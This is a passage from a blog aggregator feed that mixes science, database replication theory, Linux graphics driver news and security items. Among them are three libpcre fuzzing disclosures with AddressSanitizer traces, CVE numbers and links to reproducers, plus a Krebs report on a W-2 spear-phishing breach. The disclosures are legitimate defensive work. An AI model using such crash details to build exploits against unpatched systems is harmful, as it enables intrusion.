Hensch’s team has shown that several physiological changes close the door on plasticity in animals. A key player is histone deacetylase (HDAC), an enzyme that acts on DNA and makes it harder to switch genes on or off.

And they used an HDAC inhibitor on humans, with considerable success.
Top

No such thing as a wilderness, part II

Postby kris via The Isoblog. »

Science Daily writes:

New research investigating the transition of the Sahara from a lush, green landscape 10,000 years ago to the arid conditions found today, suggests that humans may have played an active role in its desertification.

[…] As more vegetation was removed by the introduction of livestock, it increased the albedo (the amount of sunlight that reflects off the earth’s surface) of the land, which in turn influenced atmospheric conditions sufficiently to reduce monsoon rainfall. The weakening monsoons caused further desertification and vegetation loss, promoting a feedback loop which eventually spread over the entirety of the modern Sahara.



Similar effects are being discussed in The Science Show of January 21, about current day South Western Australia:

Europeans began altering the landscape following settlement of the region in 1829. Vast areas of eucalypt forest were cleared for crops and pasture. Cleared land produces less turbulence as storms move across the landscape. And fewer big trees means less transpiration. The atmosphere is drier, the storms slip by, with less rain produced. Now global effects mean cold fronts are passing further south, some missing the continent altogether. The water table is falling by half a metre a year. If the trend continues, there are predictions of a 17% drop in agricultural production in future decades.

Top

No such thing as a wilderness?

Postby kris via The Isoblog. »

Some 40 authors are listed on Persistent effects of pre-Columbian plant domestication on Amazonian forest composition in Science. The TL;DR is: the Amazon rain forest is a 10,000-year-old garden, which has been left untended for the last 500 years, since the genocide of the Amerindians by the European conquistadors.



The extent to which pre-Columbian societies altered Amazonian landscapes is hotly debated. We performed a basin-wide analysis of pre-Columbian impacts on Amazonian forests by overlaying known archaeological sites in Amazonia with the distributions and abundances of 85 woody species domesticated by pre-Columbian peoples. Domesticated species are five times more likely than nondomesticated species to be hyperdominant.

Across the basin, the relative abundance and richness of domesticated species increase in forests on and around archaeological sites. In southwestern and eastern Amazonia, distance to archaeological sites strongly influences the relative abundance and richness of domesticated species. Our analyses indicate that modern tree communities in Amazonia are structured to an important extent by a long history of plant domestication by Amazonian peoples.

The full article is unfortunately behind a paywall.
Top

Salted Doorknobs kill MRSA

Postby kris via The Isoblog. »

Says this article at The Atlantic:

Superbugs like Methicillin-resistant Staphylococcus aureus, or MRSA, have wreaked havoc on the health-care system in recent years. […] How do you stop them? Frequent hand washing is one option, but that requires a behavior change, which can be difficult, even for hospital staff. Another option is to coat those frequently fondled objects most likely to carry the bugs—doorknobs, bed rails, toilet handles—with a special anti-microbial surface, like copper. […] Whitlock found that salt killed off the bug 20 to 30 times faster than the copper did, reducing MRSA levels by 85 percent after 20 seconds, and by 94 percent after a minute.

Top

If you can find Nemo, the reef is already dying

Postby kris via The Isoblog. »

The Atlantic has an article about intact vs. overfished coral reefs.

[L]arge predators both reflect and safeguard the health of coral reefs. If they’re fished out, the rippling consequences can be devastating, leading to fewer fish and sicklier corals. And since those changes happened decades ago, they’ve influenced our perceptions of what coral reefs should look like. We think of the kaleidoscopic realms of Pixar movies or aquarium tanks, but those are reefs that have already been badly depleted. Pristine ones are worlds where predators abound, and colorful prey cower within the coral. “It’s like the difference between the English countryside and the African Serengeti,” […]

Top

New Arrival: How to Kill a City

Postby kris via The Isoblog. »

Peter Moskowitz has written a book on “Gentrification, Inequality, and the Fight for the Neighborhood”, titled “How to Kill a City”. It’s available on Kindle for some 11 Euro.

There is a matching article in The Atlantic, The Steady Destruction of America’s Cities. Based on observations in Detroit, San Francisco, New York and Post-Katrina New Orleans, he tries to explain the process of Gentrification and distinguish it from urban renewal or other forms of change that are frequent in cities.

“While urban renewal, the suburbanization of cities, and other forms of capital creation are relatively easy to spot (a highway built through a neighborhood is a relatively obvious event), gentrification is more discreet, dispersed, and hands-off,” he writes. Moskowitz adds to the growing canon aimed at understanding and explaining the process of gentrification, and he not so subtly suggests that while gentrification naturally brings some improvements to a city, including more people and money, it also frequently kills some cultural traditions and diversity, the precise characteristics that make cities so dynamic and desirable in the first place.

Top

Ubuntu 12.04 LTS expires next month, but there’s the Dodo club

Postby kris via The Isoblog. »

So Precise Pangolin was published as Ubuntu 12.04 LTS on April 26, 2012.

That’s a long time ago. Back then, Battleship, The Avengers (3D) and Cabin In The Woods (3D) were released. Intel released the Ivy Bridge Microarchitecture. The last proper US president campaigned for his second term and the US weren’t a failed state back then. It was a different world.



Since then, Ubuntu has seen the 12.10, 13.04, 13.10, 14.04 LTS, 14.10, 15.04, 15.10, 16.04 LTS and 16.10 releases, and the 17.04 release is due RSN. That’s 10 Ubuntu releases, and two of them are LTS.

You should have upgraded since then. Twice. At least. If you haven’t:

You suck.
Your Devops is weak.
And you should feel bad.

Anyway: Support for 12.04 ends in a month.

If you want to join the Dodo club, though, together with the world’s remaining XP users, you can pay. Because there is the Ubuntu 12.04 Extended Security Maintenance subscription. It’s Ubuntu 12.04, and it’s extended and it’s probably maintenance, but it certainly has nothing to do with “security”. That would mean upgrading.
Top

Galera vs. Group Replication

Postby kris via The Isoblog. »

Percona: Galera ./. Group Replication
A blog post over at Percona discusses better replication for MySQL and compares Galera and MySQL Group Replication.

Galera builds its own initial state transfer mechanism and its own transaction distribution mechanism, independently of MySQL replication (write-set replication, wsrep). wsrep is synchronous: on commit, the write set is shipped, applied and acknowledged (or not).

MySQL Group Replication strives to achieve the same thing, but uses its own, “MySQL native” set of technologies to do this.

The Galera cluster accepts writes to multiple cluster nodes concurrently, and will apply them successfully as long as the primary keys in the write sets (transactions) concurrently being applied within the cluster do not overlap. If there are collisions, they will make one of the colliding write sets fail, and cause a rollback of the transaction.
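The first-committer-wins behavior described above can be sketched in a few lines of Python. This is a toy model, not Galera's actual certification algorithm (real certification tracks sequence numbers and certification intervals); it only illustrates how overlapping primary keys cause one write set to be rolled back:

```python
# Toy model of certification-based replication: each write set lists the
# primary keys it touches; write sets are certified in total order, and a
# write set overlapping an already-certified one fails and is rolled back.

def certify(write_sets):
    """Certify (txn_id, touched_keys) pairs; return committed and rolled back."""
    seen = set()
    committed, rolled_back = [], []
    for txn_id, keys in write_sets:
        if seen & set(keys):            # primary keys collide with earlier txn
            rolled_back.append(txn_id)  # certification failure -> rollback
        else:
            seen |= set(keys)
            committed.append(txn_id)
    return committed, rolled_back

# Transactions A and B, committed on different nodes, both touch key 7:
committed, rolled_back = certify([("A", [1, 7]), ("B", [7, 9]), ("C", [2])])
print(committed, rolled_back)  # ['A', 'C'] ['B']
```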

Galera does not propagate locks, though, only writes. Which means that it cannot isolate properly, by construction, and that transactions of the form

BEGIN;
SELECT id FROM t WHERE id = ? FOR UPDATE;
UPDATE t SET d = ? WHERE id = ?;
COMMIT;
can’t work, because the X-Lock set by the SELECT FOR UPDATE statement goes nowhere in the cluster.

Most users of Galera do not, by default, write to multiple nodes, but a single cluster node. There may be concurrent updates during a failover situation. This use of Galera avoids many of the problems with missing lock propagation, and the concurrency issues that could come from frequently overlapping write sets on multiple masters.

MySQL Group Replication is constructed quite similarly, and has similar deployment properties, even if the implementation is independent and different.

If you are using either Galera or MySQL Group Replication as a mechanism to migrate from a single master as a SPOF to a more resilient setup, this may work, but it has its own issues during failover, and in normal operation, too. Especially if there are transactions with a more complicated lock structure and concurrent distributed writes involved: both products will reliably fail in such a scenario, so you need to validate that the workload matches the capabilities of the chosen cluster.
Top

Some basics about distributed databases

Postby kris via The Isoblog. »

This is a replay of a much older blog post, which was available in German language in the old blog. It’s from 2012, and neither GTID nor Galera cluster or Group Replication existed back then.

Wonka> http://www.toppoint.de will probably never have meaningful load, but I would like to know how one would make this highly available. Some kind of Redundant Array of Inexpensive Databases.

Lalufu> MySQL with replication? Or DRBD?

Isotopp> With DRBD. Not with replication.



Wonka> Lalufu: Hm, Master-Master replication is with two hosts. If you want more than that you could build rings, but only singly linked.

Isotopp> Wonka: Argh! Master-Master does not work with replication, ever.

Wonka> huh?

Isotopp> Thread 1 writes to Master 1:

insert into t (id, d) values (NULL, 'one');
At the same time, Thread 2 writes to Master 2:

insert into t (id, d) values (NULL, 'two');
Isotopp> What’s the content of the database master1, what’s the content of database master2? If you assume auto_increment_increment and auto_increment_offset to be configured correctly?

Wonka> Isotopp: Ok, Problem. Still, there are many HOWTOs about that.

Isotopp> Wonka: Not a problem, yet. You will have (1, ‘one’) and (2, ‘two’). So far it works.
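The id interleaving that makes this first step work can be sketched in a few lines of Python. This is a toy model of what auto_increment_increment and auto_increment_offset do on a correctly configured two-master pair, not MySQL code:

```python
# Toy model of auto_increment_increment / auto_increment_offset: with
# increment 2 and offsets 1 and 2, the two masters generate disjoint id
# sequences, so concurrent INSERTs never collide on the primary key.

def generated_ids(offset, increment, count):
    """The ids a master hands out under the given auto_increment settings."""
    return [offset + i * increment for i in range(count)]

master1 = generated_ids(offset=1, increment=2, count=3)  # [1, 3, 5]
master2 = generated_ids(offset=2, increment=2, count=3)  # [2, 4, 6]
print(master1, master2)
assert not set(master1) & set(master2)  # no collisions on INSERT
```

This is exactly why the two INSERTs above land as (1, ‘one’) and (2, ‘two’) instead of colliding.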

kv_> After UPDATE things will look worse.

Isotopp> Now Thread 1 runs an UPDATE against Master 1.

update t set d = 'een' where id = 1;
And Thread 2 does an UPDATE against Master 2:

update t set d = 'eins' where id = 1;
Isotopp> What’s the content of Master 1 and Master 2 now? The point being that there is no global timeline for the entire ring, so there is no single global serialization of the ring’s history. Instead each local node has its own local order of events. That means on Master 1 you can have an order of events one, een, eins and on Master 2 it can be one, eins, een.
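That divergence can be sketched in a few lines of Python. A toy model, not MySQL: two nodes apply the same two UPDATEs in their own local order, and "last write wins" on each node:

```python
# Toy model of the ring above: the same two UPDATEs reach the two masters in
# opposite order, each node applies them in its own local order, and the last
# write wins locally, so the nodes end up permanently disagreeing.

def apply_updates(initial, updates_in_local_order):
    """Apply successive values for column d in this node's local order."""
    d = initial
    for new_d in updates_in_local_order:
        d = new_d
    return d

master1 = apply_updates("one", ["een", "eins"])  # its local write arrived first
master2 = apply_updates("one", ["eins", "een"])  # its local write arrived first
print(master1, master2)  # eins een
assert master1 != master2  # the ring has silently diverged
```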

Lalufu> Actually the problem is that people would like to have such a global order, but MySQL can’t deliver that.

Isotopp> It’s even more complicated. Let me explain to the end.

Wonka> http://www.howtoforge.com/mysql_master_master_replication “This tutorial describes how to set up MySQL master-master replication. We need to replicate MySQL servers to achieve high-availability (HA). In my case I need two masters that are synchronized with each other so that if one of them drops down, other could take over and no data is lost. Similarly when the first one goes up again, it will still be used as slave for the live one.”

Wonka> So they did not understand this.

Isotopp> Exactly. They think they can win, but you cannot cheat the universe. So you want to enforce such a serialisation. In SQL you enforce an ordering of events with locks on the domain you want to enforce an order on. That means you need locking that works on the entire domain, all servers in it.

Because your domain is no longer a single box. For a single box you do have local locking. But now you have that cluster, or a ring. And MySQL replication specifically has no locking protocol. Such locking protocols do exist, 2PC, 3PC, Paxos, and a few more. 2PC is the ‘fastest’ in the sense that it uses a minimal number of round trips in the case of no special events happening during the lock synchronisation in the cluster. Paxos is the best with respect to recoverability.

Without a locking protocol you can’t do concurrent writes safely, because you do not create a globally identical serialisation of events. Any setup with more than one writer without a distributed locking protocol is broken.
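The happy path of 2PC mentioned above can be sketched as a toy coordinator. This ignores timeouts and coordinator crashes, which are exactly the cases where Paxos-style protocols earn their reputation for recoverability:

```python
# Toy two-phase commit coordinator: one prepare round and one decision round
# when nothing goes wrong, which is the "minimal round trips" property.
# No timeouts, no coordinator failure handling: a sketch only.

def two_phase_commit(participants):
    # Phase 1: ask every participant to prepare (first round trip).
    if all(p["can_commit"] for p in participants):
        decision = "commit"
    else:
        decision = "abort"
    # Phase 2: broadcast the decision (second round trip).
    for p in participants:
        p["state"] = decision
    return decision

nodes = [{"can_commit": True, "state": None} for _ in range(3)]
print(two_phase_commit(nodes))  # commit

nodes[1]["can_commit"] = False  # one participant cannot prepare
print(two_phase_commit(nodes))  # abort -> everybody rolls back
```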

Now we read the instructions for mmm, MySQL Multi Master. They say: Writes all need to go to one single node. So, Ring, but not actually Multi Master – the name is fake.

Looking elsewhere, does not matter where: EITHER synchronisation by locks, OR one master/write node OR broken.

These are all available choices. There are no others.

kv_> Wonka: And if you ask people why they are using Master-Master or circular replication, the answer is always the wrong one: “High Availability” or “Load Balancing”. For high availability, take shared storage at the operating system level, NetApp or DRBD. And for load balancing take one-way replication. Write distribution MySQL does not do. People who need this will do application-level sharding.

Isotopp> Precisely.

And now coming back to MySQL and delivering: There is a product from MySQL with multiple nodes and 2PC. It’s called MySQL Cluster. It does not use MySQL replication to achieve this.

And wrt HA: MySQL 5.1, 5.5 and 5.6 have different increments of Semi-Synchronous Replication (SSR). You can have one master but multiple slaves, which will delay the commit on the master until there is at least one slave that has the same data as the master. That combines the disadvantages of 2PC (slower) with the disadvantages of replication, which are:

In MySQL replication each slave is dependent on the binlog position, which each slave has locally. That means, you can’t simply move Slave 3 from Master 1 to Slave 2, even if Slave 2 is known to be at the same position as Master 1 thanks to SSR.

That’s because the binlog position of Master 1 is expressed as (mname, mpos), but the same position on Slave 2 would be (s2name, s2pos). You would need a translation mechanism for each of those in order to change between them.

Beginning with MySQL 5.6 you get Global Transaction ID (GTID), which is such a translation mechanism. With SSR and GTID together you can finally use replication as a HA mechanism and could build a stable ring with exactly one active master. You still have a bit of waits because of SSR, but failover is smooth.
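The translation problem that GTID solves can be sketched as follows. The binlog file names and positions here are made up for illustration; the point is that (file, position) coordinates are local to one server, while a GTID names the transaction itself and is identical everywhere:

```python
# Toy model: the same two transactions, as seen in two servers' binlogs.
# Coordinates (file, position) differ per server; GTIDs do not.

master1_binlog = {("m1-bin.000001", 120): "uuid:1",
                  ("m1-bin.000001", 340): "uuid:2"}
slave2_binlog  = {("s2-bin.000007", 4):   "uuid:1",
                  ("s2-bin.000007", 224): "uuid:2"}

# Slave 3 cannot reuse its (file, position) coordinates from Master 1 on
# Slave 2 -- the coordinate systems are unrelated:
assert set(master1_binlog) != set(slave2_binlog)

# But the executed GTID sets match, so with GTID a slave can attach to any
# server and just ask for the transactions it is missing:
assert set(master1_binlog.values()) == set(slave2_binlog.values())
print(sorted(master1_binlog.values()))
```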

You still have no simple way of doing proper multi-master, because MySQL Cluster is not a good replacement for vanilla MySQL as used by vanilla MySQL applications.

Top

Tumblr of the Day: Berlin Typography

Postby kris via The Isoblog. »

Tumblr of the Day is actually a WordPress: Berlin Typography takes photos of shop signs and other urban lettering and discusses them.

Check out their post about “The Typography of Hair Salons“.

Top

This week in vc4 2017-03-20: HDMI Audio, ARM CLCD, glamor

Postby Eric Anholt via anholt's lj »

The biggest news this week is that I've landed the VC4 HDMI audio driver from Boris in drm-misc-next.  The alsa-lib maintainers took the patch today for the automatic configuration file, so now we just need to get that backported to various distributions and we'll have native HDMI audio in 4.12.

My main project, though, was cleaning up the old ARM CLCD controller driver.  I've cut the driver from 3500 lines of code to 1000, and successfully tested it with VC4 doing dmabuf sharing to it.  It was surprising how easy the dmabuf part actually was, once I had display working.

Still to do for display on this platform is to get CLCD merged, get my kmscube patches merged (letting you do kmscube on a separate display vs gpu platform), and clean up my xserver patches.  The xserver changes are to let you have a 3D GPU with no display connectors as the protocol screen and the display controller as its sink.  We had infrastructure for most of this for doing PRIME in laptops, except that laptop GPUs all have some display connectors, even if they're not actually connected to anything.

I also had a little time to look into glamor bugs.  I found a little one-liner to fix dashed lines (think selection rectangles in the GIMP), and debugged a report of how zero-width lines are broken.  I'm afraid for VC4 we're going to need to disable X's zero-width line acceleration.  VC4 hardware doesn't implement the diamond-exit rule, and actually has some workarounds in it for the way people naively *try* to draw lines in GL that thoroughly breaks X11.

In non-vc4 news, the SDHOST driver is now merged upstream, so it should be in 4.12.  It won't quite be enabled in 4.12, due to the absurd merge policies of the arm-soc world, but at least the Fedora and Debian kernel maintainers should have a much easier time with Pi3 support at that point.
Top


The next bond film…

Postby kris via The Isoblog. »

My WhatsApp said:



The next Bond is with Gillian Anderson as Bond. And she’s got to neutralize the misogynistic US president, who deserted to the Russians.

HHOS.
Top

libpcre: invalid memory read in _pcre32_xclass (pcre_xclass.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed an invalid memory read. Upstream says that this bug is fixed by one of the previous commits. However, I’m providing as usual the stacktrace and the reproducer, so if you are not running the latest upstream release, as happens on Debian/RHEL-based distros, you may want to double-check the status of this bug.

The complete ASan output:

# pcretest -32 -d $FILE
==27914==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3f580efe04 (pc 0x7f3f577b8048 bp 0x7ffcb035b390 sp 0x7ffcb035b320 T0)
==27914==The signal is caused by a READ memory access.
    #0 0x7f3f577b8047 in _pcre32_xclass /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_xclass.c:135:30
    #1 0x7f3f576137ca in match /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:3203:16
    #2 0x7f3f575e7226 in pcre32_exec /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:6936:8
    #3 0x527d6c in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5218:9
    #4 0x7f3f565b478f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #5 0x41b438 in _init (/usr/bin/pcretest+0x41b438)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_xclass.c:135:30 in _pcre32_xclass
==27914==ABORTING
Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-7244

Reproducer:
https://github.com/asarubbo/poc/blob/master/00206-pcre-invalidread-_pcre32_xclass

Timeline:
2017-02-24: bug discovered and reported to upstream
2017-03-20: blog post about the issue
2017-03-23: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: invalid memory read in _pcre32_xclass (pcre_xclass.c)

Top

libpcre: heap-based buffer overflow in regexflip8_or_16 (pcretest.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed a heap overflow in the utility itself. Upstream’s feedback follows:

I am not going to do anything about this one. (a) It is concerned with a feature of pcretest that has been dropped from pcre2test, and (b) the input contains binary zeros, which are not supported in pcretest input. This is documented for pcre2test but not, I see, for pcretest. I have added a paragraph to the documentation.

However, it does not cost much for me to inform the community that this bug exists.
In any case, if you have a web application that directly calls the pcretest utility to parse untrusted data, then you are affected.
Also, it is important to share the details because some distros/packagers may want to patch this issue instead of following upstream’s way.

The complete ASan output:

# pcretest -16 -d $FILE
==30352==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000b000 at pc 0x00000053cef0 bp 0x7ffd02dccb90 sp 0x7ffd02dccb88
READ of size 2 at 0x60b00000b000 thread T0
    #0 0x53ceef in regexflip8_or_16 /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2552:24
    #1 0x53ceef in regexflip /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2792
    #2 0x53ceef in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:4425
    #3 0x7fb6693d678f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)

0x60b00000b000 is located 0 bytes to the right of 112-byte region [0x60b00000af90,0x60b00000b000)
allocated by thread T0 here:
    #0 0x4d41f8 in malloc /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x53e883 in new_malloc /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2372:15
    #2 0x7fb66a9473a1 in pcre16_compile2 /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_compile.c:9393:19
    #3 0x5335d9 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:4034:5
    #4 0x7fb6693d678f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289

SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2552:24 in regexflip8_or_16
Affected version:
8.40

Commit fix:
N/A

Fixed version:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

Reproducer:
https://github.com/asarubbo/poc/blob/master/00196-pcre-heapoverflow-regexflip8_or_16

Timeline:
2017-02-22: bug discovered and reported to upstream
2017-03-20: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: heap-based buffer overflow in regexflip8_or_16 (pcretest.c)

Top

libpcre: two stack-based buffer overflow write in pcre32_copy_substring (pcre_get.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

Fuzzing libpcre1 through the pcretest utility revealed two stack-based buffer overflow writes. Upstream says that these bugs were fixed by an earlier commit. However, I am providing the stacktraces and reproducers as usual, so if you are not running the latest upstream release, as often happens on Debian/RHEL-based distros, you may want to double-check the status of this bug.

The complete ASan output:

# pcretest -32 -d $FILE
==29686==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f58f32026a0 at pc 0x7f58f6f90a24 bp 0x7ffea3aa3b30 sp 0x7ffea3aa3b28
WRITE of size 4 at 0x7f58f32026a0 thread T0
    #0 0x7f58f6f90a23 in pcre32_copy_substring /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_get.c:358:15
    #1 0x528220 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5333:13
    #2 0x7f58f5ea778f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #3 0x41b438 in _init (/usr/bin/pcretest+0x41b438)
Reproducer:
https://github.com/asarubbo/poc/blob/master/00207-pcre-stackoverflow-pcre32_copy_substring
CVE:
CVE-2017-7245

# pcretest -32 -d $FILE
==21399==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f83734026a0 at pc 0x0000004bd2ac bp 0x7ffdda673b30 sp 0x7ffdda6732e0
WRITE of size 268 at 0x7f83734026a0 thread T0
    #0 0x4bd2ab in __asan_memcpy /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413
    #1 0x7f8377118925 in pcre32_copy_substring /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_get.c:357:1
    #2 0x528220 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5333:13
    #3 0x7f837602f78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)
Reproducer:
https://github.com/asarubbo/poc/blob/master/00209-pcre-stackoverflow2-read_capture_name32
CVE:
CVE-2017-7246

Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

Timeline:
2017-02-24: bug discovered and reported to upstream
2017-03-20: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: two stack-based buffer overflow write in pcre32_copy_substring (pcre_get.c)

Top

Mac mini G4 vs Raspi 3

Postby kris via The Isoblog. »

The Original Mac Mini G4 had a single-core 32-Bit PowerPC CPU at some 1.25 GHz with 512 KB on-chip Cache. It was released in 2005.

It has a Geekbench Score of 766.

 

Raspi 3 by User:Evan-Amos
The Raspberry Pi is basically a cellphone without the battery and the packaging. The Raspberry Pi 3 was released in 2016, and has a Broadcom BCM2837 with a quad-core ARM CPU at 1.2 GHz.

It has a Geekbench Score of 2128.

In case you need to illustrate how Moore’s Law works in a practical, touchable way.
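The two scores invite a quick back-of-the-envelope calculation. Using just the Geekbench results and release years quoted above (a single benchmark each, so treat the answer as illustrative only):

```python
import math

# Numbers quoted in the post; a rough illustration, not a rigorous benchmark.
g4_score, g4_year = 766, 2005      # Mac mini G4
pi3_score, pi3_year = 2128, 2016   # Raspberry Pi 3

years = pi3_year - g4_year         # 11 years apart
ratio = pi3_score / g4_score       # ~2.8x the Geekbench score

# If performance doubles every T years: ratio = 2 ** (years / T)
doubling_time = years * math.log(2) / math.log(ratio)
print(f"{ratio:.2f}x in {years} years ~ doubling every {doubling_time:.1f} years")
```

That works out to a doubling time of roughly seven and a half years for this (price-incomparable) pair of machines.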
Top

Pulse of Europe

Postby kris via The Isoblog. »

Pulse Of Europe


We are convinced that the majority of people believe in the fundamental idea of the European Union. We all must now send out positive energy against current tendencies. The European pulse must be felt everywhere!

We have a big goal: to gather as many people as possible in Europe, who stand for Europe, and are able to support pro-European forces after the elections. Thus we can form a human chain all across Europe connecting Germany, France and the Netherlands.

We are meeting every Sunday in several European cities: Frankfurt, Paris, Amsterdam, Köln, Freiburg, etc. Check out the language versions of this website for a full list.

The Amsterdam Group meets every Sunday, 14:00 on the lawn behind the Rijksmuseum.
Top

When the ice melts, what does that look like?

Postby kris via The Isoblog. »

Drum-Heller-Channels by User:Woofles
National Geographic’s Glenn Hodges explains the Channeled Scablands of Washington State, with some quite awesome photos by Michael Melford.

In the middle of eastern Washington, in a desert that gets less than eight inches of rain a year, stands what was once the largest waterfall in the world. It is three miles wide and 400 feet high—ten times the size of Niagara Falls—with plunge pools at its base suggesting the erosive power of an immense flow of water.

Top

Before Code, there was the Codex

Postby kris via The Isoblog. »

Nautilus has an article by Philip Auerswald, Author of The Code Economy: A Forty-Thousand-Year History. Auerswald tries to tie our current practice of crystallising rules in Code back to the Codexes and Recipes of older times, and sees our civilisation as a system of dealing with complexity by packaging and encapsulating it. According to Auerswald, running Code on machines is new, previously we have been running it on humans:

“Code” as I intend it incorporates elements of computer code, genetic code, cryptologic code, and other forms as well. But, as I describe in my book The Code Economy: A Forty-Thousand Year History, published this year, it also stands as its own concept—the algorithms that guide production in the economy—for which no adequate word yet exists. Code can include instructions we follow consciously and purposively, and those we follow unconsciously and intuitively.

Top

When you commit to git, how long does it matter?

Postby kris via The Isoblog. »

Commit to git
Erik Bernhardsson has been running Big Data on Git repositories of various kinds.

He was trying to find out what the half-life of code is. That is, when you commit to a repository, your code becomes part of a project, but eventually other code will replace it and it will no longer be part of the current version. How stable is the codebase, what is the half-life of code? And why is it different in different projects?

As a project evolves, does the new code just add on top of the old code? Or does it replace the old code slowly over time? In order to understand this, I built a little thing to analyze Git projects, with help from the formidable GitPython project. The idea is to go back in history and run a git blame […]
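Bernhardsson’s actual analysis walks the git history and blames every line; as a toy model, though, code survival can be treated as exponential decay, which makes the implied half-life a one-liner. A sketch (the 70%-after-two-years figure below is hypothetical, not from his data):

```python
import math

def code_half_life(years: float, surviving_fraction: float) -> float:
    """Half-life implied by exponential decay:
    surviving_fraction == 0.5 ** (years / half_life)."""
    return years * math.log(0.5) / math.log(surviving_fraction)

# Hypothetical numbers: if git blame showed 70% of a commit's lines
# still present two years later, the implied half-life is ~3.9 years.
print(code_half_life(2.0, 0.7))
```

Real codebases don’t decay uniformly, of course, which is exactly why the per-project differences Bernhardsson found are interesting.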

Top

Magic circles banning autonomous cars

Postby kris via The Isoblog. »

Trapping Autonomous Cars
Somebody sent me a link to Vice with the comment “A multiple hit in the Venn Diagram of your interests”.

It’s about an artist using technology disguised as ritual magic to trap self-driving cars (and similar shenanigans). The assessment was correct; this is beautiful.

The image from the article shows a self-driving car trapped inside fake street markings. The broken lines allow the car’s logic to enter the circle; the unbroken lines mark a boundary that must not be crossed, so the car can never leave.

It ties back to a story my driving instructor told me. He was making a point about how the way things are presented matters, telling of a beginning driver who had been told to imagine unbroken lines as a “wall that cannot be crossed” and who had problems because of that – sometimes rules must be broken to preserve their meaning and spirit.

Top

Govt. Cybersecurity Contractor Hit in W-2 Phishing Scam

Postby BrianKrebs via Krebs on Security »

Just a friendly reminder that phishing scams which spoof the boss and request W-2 tax data on employees are intensifying as tax time nears. The latest victim shows that even cybersecurity experts can fall prey to these increasingly sophisticated attacks.

On Thursday, March 16, the CEO of Defense Point Security, LLC — a Virginia company that bills itself as “the choice provider of cyber security services to the federal government” — told all employees that their W-2 tax data was handed directly to fraudsters after someone inside the company got caught in a phisher’s net.

Alexandria, Va.-based Defense Point Security (recently acquired by management consulting giant Accenture) informed current and former employees this week via email that all of the data from their annual W-2 tax forms — including name, Social Security Number, address, compensation, tax withholding amounts — were snared by a targeted spear phishing email.

“I want to alert you that a Defense Point Security (DPS) team member was the victim of a targeted spear phishing email that resulted in the external release of IRS W-2 Forms for individuals who DPS employed in 2016,” Defense Point CEO George McKenzie wrote in the email alert to employees. “Unfortunately, your W-2 was among those released outside of DPS.”

W-2 scams start with spear phishing emails usually directed at finance and HR personnel. The scam emails will spoof a request from the organization’s CEO (or someone similarly high up in the organization) and request all employee W-2 forms.

Defense Point did not return calls or emails seeking comment. An Accenture spokesperson issued the following brief statement:  “Data protection and our employees are top priorities. Our leadership and security team are providing support to all impacted employees.”

The email that went out to Defense Point employees Thursday does not detail when this incident occurred, to whom the information was sent, or how many employees were impacted. But a review of information about the company on LinkedIn suggests the breach letter likely was sent to around 200 to 300 employees nationwide (if we count past employees also).

Among Defense Point’s more sensitive projects is the U.S. Immigration and Customs Enforcement (ICE) Security Operations Center (SOC) based out of Phoenix, Ariz. That SOC handles cyber incident response, vulnerability mitigation, incident handling and cybersecurity policy enforcement for the agency.

